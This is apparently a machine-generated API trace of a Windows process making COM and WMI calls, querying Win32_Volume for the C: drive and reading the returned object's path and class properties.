	[0258.679] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8e5c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee22c | out: ppvObject=0x5dee22c*=0x7f8e5c) returned 0x0
	[0258.679] WbemLocator:IUnknown:Release (This=0x7f8e5c) returned 0x2
	[0258.679] WbemLocator:IUnknown:Release (This=0x7f8e5c) returned 0x1
	[0258.679] CoGetContextToken (in: pToken=0x5dede0c | out: pToken=0x5dede0c) returned 0x0
	[0258.679] CoGetContextToken (in: pToken=0x5deddcc | out: pToken=0x5deddcc) returned 0x0
	[0258.679] WbemLocator:IUnknown:AddRef (This=0x7f8e5c) returned 0x2
	[0258.679] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8e5c, riid=0x5dede48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dede44 | out: ppvObject=0x5dede44*=0x635de2c) returned 0x0
	[0258.679] WbemLocator:IUnknown:Release (This=0x7f8e5c) returned 0x2
	[0258.680] WbemLocator:IUnknown:AddRef (This=0x635de2c) returned 0x3
	[0258.680] IWbemServices:ExecQuery (in: This=0x635de2c, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x5dee450 | out: ppEnum=0x5dee450*=0x635cb34) returned 0x0
	[0258.687] IUnknown:QueryInterface (in: This=0x635cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0fc | out: ppvObject=0x5dee0fc*=0x635cb38) returned 0x0
	[0258.687] IClientSecurity:QueryBlanket (in: This=0x635cb38, pProxy=0x635cb34, pAuthnSvc=0x5dee144, pAuthzSvc=0x5dee140, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148, pImpLevel=0x5dee134, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c | out: pAuthnSvc=0x5dee144*=0xa, pAuthzSvc=0x5dee140*=0x0, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148*=0x6, pImpLevel=0x5dee134*=0x2, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c*=0x1) returned 0x0
	[0258.687] IUnknown:Release (This=0x635cb38) returned 0x1
	[0258.687] IUnknown:QueryInterface (in: This=0x635cb34, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0f0 | out: ppvObject=0x5dee0f0*=0x7f8d6c) returned 0x0
	[0258.687] IUnknown:QueryInterface (in: This=0x635cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0ec | out: ppvObject=0x5dee0ec*=0x635cb38) returned 0x0
	[0258.687] IClientSecurity:SetBlanket (This=0x635cb38, pProxy=0x635cb34, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.694] IUnknown:Release (This=0x635cb38) returned 0x2
	[0258.694] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x1
	[0258.694] CoTaskMemFree (pv=0x7f84c8) 
	[0258.694] WbemLocator:IUnknown:Release (This=0x635de2c) returned 0x2
	[0258.694] IUnknown:QueryInterface (in: This=0x635cb34, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedaa8 | out: ppvObject=0x5dedaa8*=0x7f8d6c) returned 0x0
	[0258.695] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda64 | out: ppvObject=0x5deda64*=0x0) returned 0x80004002
	[0258.698] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded958 | out: ppvObject=0x5ded958*=0x0) returned 0x80004002
	[0258.713] WbemLocator:IUnknown:AddRef (This=0x7f8d6c) returned 0x3
	[0258.713] CoGetContextToken (in: pToken=0x5ded8f0 | out: pToken=0x5ded8f0) returned 0x0
	[0258.713] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8d8 | out: ppvObject=0x5ded8d8*=0x7f8ccc) returned 0x0
	[0258.714] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f8ccc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8e0 | out: pCid=0x5ded8e0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.714] WbemLocator:IUnknown:Release (This=0x7f8ccc) returned 0x3
	[0258.714] CoGetContextToken (in: pToken=0x5ded8e8 | out: pToken=0x5ded8e8) returned 0x0
	[0258.714] WbemLocator:IUnknown:AddRef (This=0x7f8d6c) returned 0x4
	[0258.714] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded95c | out: ppvObject=0x5ded95c*=0x7f8d54) returned 0x0
	[0258.714] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x4
	[0258.714] WbemLocator:IRpcOptions:Query (in: This=0x7f8d54, pPrx=0x7f8d6c, dwProperty=2, pdwValue=0x5ded980 | out: pdwValue=0x5ded980) returned 0x80004002
	[0258.714] WbemLocator:IUnknown:Release (This=0x7f8d54) returned 0x3
	[0258.715] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x2
	[0258.715] CoGetContextToken (in: pToken=0x5dedd5c | out: pToken=0x5dedd5c) returned 0x0
	[0258.715] CoGetContextToken (in: pToken=0x5dedd1c | out: pToken=0x5dedd1c) returned 0x0
	[0258.715] WbemLocator:IUnknown:AddRef (This=0x7f8d6c) returned 0x3
	[0258.715] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x5dedd98*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedd94 | out: ppvObject=0x5dedd94*=0x635cb34) returned 0x0
	[0258.715] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x3
	[0258.715] IUnknown:Release (This=0x635cb34) returned 0x2
	[0258.715] IUnknown:Release (This=0x635cb34) returned 0x1
	[0258.716] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635d3d8, puCount=0x5dee6e8 | out: puCount=0x5dee6e8*=0x2) returned 0x0
	[0258.716] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee6e4*=0x0, pszText=0x0 | out: puBuffLength=0x5dee6e4*=0x17, pszText=0x0) returned 0x0
	[0258.716] WbemDefPath:IWbemPath:GetText (in: This=0x635d3d8, lFlags=4, puBuffLength=0x5dee6e4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee6e4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0258.716] CoGetContextToken (in: pToken=0x5dee084 | out: pToken=0x5dee084) returned 0x0
	[0258.716] CoGetContextToken (in: pToken=0x5dee044 | out: pToken=0x5dee044) returned 0x0
	[0258.716] WbemLocator:IUnknown:AddRef (This=0x7f8d6c) returned 0x2
	[0258.716] WbemLocator:IUnknown:QueryInterface (in: This=0x7f8d6c, riid=0x5dee0c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee0bc | out: ppvObject=0x5dee0bc*=0x635cb34) returned 0x0
	[0258.716] WbemLocator:IUnknown:Release (This=0x7f8d6c) returned 0x2
	[0258.716] IUnknown:AddRef (This=0x635cb34) returned 0x3
	[0258.716] IEnumWbemClassObject:Clone (in: This=0x635cb34, ppEnum=0x5dee6b8 | out: ppEnum=0x5dee6b8*=0x635decc) returned 0x0
	[0258.721] IUnknown:QueryInterface (in: This=0x635decc, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x635ded0) returned 0x0
	[0258.721] IClientSecurity:QueryBlanket (in: This=0x635ded0, pProxy=0x635decc, pAuthnSvc=0x5dee3bc, pAuthzSvc=0x5dee3b8, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0, pImpLevel=0x5dee3ac, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4 | out: pAuthnSvc=0x5dee3bc*=0xa, pAuthzSvc=0x5dee3b8*=0x0, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0*=0x6, pImpLevel=0x5dee3ac*=0x2, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4*=0x1) returned 0x0
	[0258.721] IUnknown:Release (This=0x635ded0) returned 0x1
	[0258.721] IUnknown:QueryInterface (in: This=0x635decc, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee368 | out: ppvObject=0x5dee368*=0x7f903c) returned 0x0
	[0258.721] IUnknown:QueryInterface (in: This=0x635decc, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee364 | out: ppvObject=0x5dee364*=0x635ded0) returned 0x0
	[0258.721] IClientSecurity:SetBlanket (This=0x635ded0, pProxy=0x635decc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0258.724] IUnknown:Release (This=0x635ded0) returned 0x2
	[0258.724] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x1
	[0258.724] CoTaskMemFree (pv=0x7f8498) 
	[0258.725] IUnknown:Release (This=0x635cb34) returned 0x2
	[0258.725] IUnknown:QueryInterface (in: This=0x635decc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedd10 | out: ppvObject=0x5dedd10*=0x7f903c) returned 0x0
	[0258.725] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dedccc | out: ppvObject=0x5dedccc*=0x0) returned 0x80004002
	[0258.727] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dedbc0 | out: ppvObject=0x5dedbc0*=0x0) returned 0x80004002
	[0258.727] WbemLocator:IUnknown:AddRef (This=0x7f903c) returned 0x3
	[0258.728] CoGetContextToken (in: pToken=0x5dedb58 | out: pToken=0x5dedb58) returned 0x0
	[0258.728] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedb40 | out: ppvObject=0x5dedb40*=0x7f8f9c) returned 0x0
	[0258.728] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f8f9c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedb48 | out: pCid=0x5dedb48*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.728] WbemLocator:IUnknown:Release (This=0x7f8f9c) returned 0x3
	[0258.728] CoGetContextToken (in: pToken=0x5dedb50 | out: pToken=0x5dedb50) returned 0x0
	[0258.728] WbemLocator:IUnknown:AddRef (This=0x7f903c) returned 0x4
	[0258.728] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedbc4 | out: ppvObject=0x5dedbc4*=0x7f9024) returned 0x0
	[0258.728] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x4
	[0258.728] WbemLocator:IRpcOptions:Query (in: This=0x7f9024, pPrx=0x7f903c, dwProperty=2, pdwValue=0x5dedbe8 | out: pdwValue=0x5dedbe8) returned 0x80004002
	[0258.728] WbemLocator:IUnknown:Release (This=0x7f9024) returned 0x3
	[0258.729] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x2
	[0258.729] CoGetContextToken (in: pToken=0x5dedfc4 | out: pToken=0x5dedfc4) returned 0x0
	[0258.729] CoGetContextToken (in: pToken=0x5dedf84 | out: pToken=0x5dedf84) returned 0x0
	[0258.729] WbemLocator:IUnknown:AddRef (This=0x7f903c) returned 0x3
	[0258.729] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x5dee000*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedffc | out: ppvObject=0x5dedffc*=0x635decc) returned 0x0
	[0258.729] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x3
	[0258.729] IUnknown:Release (This=0x635decc) returned 0x2
	[0258.729] IUnknown:Release (This=0x635decc) returned 0x1
	[0258.729] CoGetContextToken (in: pToken=0x5dee5b8 | out: pToken=0x5dee5b8) returned 0x0
	[0258.729] CoGetContextToken (in: pToken=0x5dee578 | out: pToken=0x5dee578) returned 0x0
	[0258.729] WbemLocator:IUnknown:AddRef (This=0x7f903c) returned 0x2
	[0258.730] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x5dee5f4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee5f0 | out: ppvObject=0x5dee5f0*=0x635decc) returned 0x0
	[0258.730] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x2
	[0258.730] IUnknown:AddRef (This=0x635decc) returned 0x3
	[0258.730] IEnumWbemClassObject:Reset (This=0x635decc) returned 0x0
	[0258.734] IUnknown:Release (This=0x635decc) returned 0x2
	[0258.734] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0258.734] IUnknown:AddRef (This=0x635decc) returned 0x3
	[0258.734] IEnumWbemClassObject:Next (in: This=0x635decc, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x311d52c | out: apObjects=0x769e88*=0x635df08, puReturned=0x311d52c*=0x1) returned 0x0
	[0258.762] IUnknown:QueryInterface (in: This=0x635df08, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedab8 | out: ppvObject=0x5dedab8*=0x635df08) returned 0x0
	[0258.762] IUnknown:QueryInterface (in: This=0x635df08, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda74 | out: ppvObject=0x5deda74*=0x0) returned 0x80004002
	[0258.762] IUnknown:QueryInterface (in: This=0x635df08, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded968 | out: ppvObject=0x5ded968*=0x0) returned 0x80004002
	[0258.762] IUnknown:AddRef (This=0x635df08) returned 0x3
	[0258.763] CoGetContextToken (in: pToken=0x5ded900 | out: pToken=0x5ded900) returned 0x0
	[0258.763] IUnknown:QueryInterface (in: This=0x635df08, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x635df0c) returned 0x0
	[0258.763] IMarshal:GetUnmarshalClass (in: This=0x635df0c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8f0 | out: pCid=0x5ded8f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0258.763] IUnknown:Release (This=0x635df0c) returned 0x3
	[0258.763] CoGetContextToken (in: pToken=0x5ded8f8 | out: pToken=0x5ded8f8) returned 0x0
	[0258.763] IUnknown:AddRef (This=0x635df08) returned 0x4
	[0258.763] IUnknown:QueryInterface (in: This=0x635df08, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded96c | out: ppvObject=0x5ded96c*=0x0) returned 0x80004002
	[0258.763] IUnknown:Release (This=0x635df08) returned 0x3
	[0258.763] IUnknown:Release (This=0x635df08) returned 0x2
	[0258.764] CoGetContextToken (in: pToken=0x5dedd58 | out: pToken=0x5dedd58) returned 0x0
	[0258.764] CoGetContextToken (in: pToken=0x5dedd18 | out: pToken=0x5dedd18) returned 0x0
	[0258.764] IUnknown:AddRef (This=0x635df08) returned 0x3
	[0258.764] IUnknown:QueryInterface (in: This=0x635df08, riid=0x5dedd94*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dedd90 | out: ppvObject=0x5dedd90*=0x635df08) returned 0x0
	[0258.764] IUnknown:Release (This=0x635df08) returned 0x3
	[0258.764] IUnknown:Release (This=0x635df08) returned 0x2
	[0258.764] IUnknown:Release (This=0x635df08) returned 0x1
	[0258.764] IUnknown:Release (This=0x635decc) returned 0x2
	[0258.764] CoGetContextToken (in: pToken=0x5dee63c | out: pToken=0x5dee63c) returned 0x0
	[0258.764] IUnknown:AddRef (This=0x635df08) returned 0x2
	[0258.764] IWbemClassObject:Get (in: This=0x635df08, wszName="__GENUS", lFlags=0, pVal=0x5dee6b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee76c*=0, plFlavor=0x5dee768*=0 | out: pVal=0x5dee6b8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5dee76c*=3, plFlavor=0x5dee768*=64) returned 0x0
	[0258.765] IWbemClassObject:Get (in: This=0x635df08, wszName="__PATH", lFlags=0, pVal=0x5dee698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee750*=0, plFlavor=0x5dee74c*=0 | out: pVal=0x5dee698*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x5dee750*=8, plFlavor=0x5dee74c*=64) returned 0x0
	[0258.765] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0258.765] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6f0 | out: ppv=0x5dee6f0*=0x718dec) returned 0x0
	[0258.765] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6e8 | out: pAptType=0x5dee6e8*=1) returned 0x0
	[0258.765] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6ec | out: ppvObject=0x5dee6ec*=0x0) returned 0x80004002
	[0258.765] IUnknown:Release (This=0x718dec) returned 0x1
	[0258.775] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee208 | out: ppv=0x5dee208*=0x635cb70) returned 0x0
	[0258.775] WbemDefPath:IUnknown:QueryInterface (in: This=0x635cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee038 | out: ppvObject=0x5dee038*=0x0) returned 0x80004002
	[0258.775] WbemDefPath:IClassFactory:CreateInstance (in: This=0x635cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee070 | out: ppvObject=0x5dee070*=0x635e0a0) returned 0x0
	[0258.775] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e0a0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede14 | out: ppvObject=0x5dede14*=0x635e0a0) returned 0x0
	[0258.776] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e0a0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddd0 | out: ppvObject=0x5deddd0*=0x0) returned 0x80004002
	[0258.776] WbemDefPath:IUnknown:AddRef (This=0x635e0a0) returned 0x3
	[0258.776] CoGetContextToken (in: pToken=0x5dedc5c | out: pToken=0x5dedc5c) returned 0x0
	[0258.776] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e0a0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc44 | out: ppvObject=0x5dedc44*=0x7ffab8) returned 0x0
	[0258.776] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ffab8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc4c | out: pCid=0x5dedc4c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0258.776] WbemDefPath:IUnknown:Release (This=0x7ffab8) returned 0x3
	[0258.777] CoGetContextToken (in: pToken=0x5dedc54 | out: pToken=0x5dedc54) returned 0x0
	[0258.777] WbemDefPath:IUnknown:AddRef (This=0x635e0a0) returned 0x4
	[0258.777] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e0a0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedcc8 | out: ppvObject=0x5dedcc8*=0x0) returned 0x80004002
	[0258.777] WbemDefPath:IUnknown:Release (This=0x635e0a0) returned 0x3
	[0258.777] WbemDefPath:IUnknown:Release (This=0x635e0a0) returned 0x2
	[0258.777] WbemDefPath:IUnknown:Release (This=0x635cb70) returned 0x0
	[0258.777] WbemDefPath:IUnknown:Release (This=0x635e0a0) returned 0x1
	[0258.777] CoGetContextToken (in: pToken=0x5dee504 | out: pToken=0x5dee504) returned 0x0
	[0258.777] CoGetContextToken (in: pToken=0x5dee4c4 | out: pToken=0x5dee4c4) returned 0x0
	[0258.777] WbemDefPath:IUnknown:AddRef (This=0x635e0a0) returned 0x2
	[0258.778] WbemDefPath:IUnknown:QueryInterface (in: This=0x635e0a0, riid=0x5dee540*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee53c | out: ppvObject=0x5dee53c*=0x635e0a0) returned 0x0
	[0258.778] WbemDefPath:IUnknown:Release (This=0x635e0a0) returned 0x2
	[0258.778] WbemDefPath:IUnknown:Release (This=0x635e0a0) returned 0x1
	[0258.778] CoGetContextToken (in: pToken=0x5dee584 | out: pToken=0x5dee584) returned 0x0
	[0258.778] CoGetContextToken (in: pToken=0x5dee544 | out: pToken=0x5dee544) returned 0x0
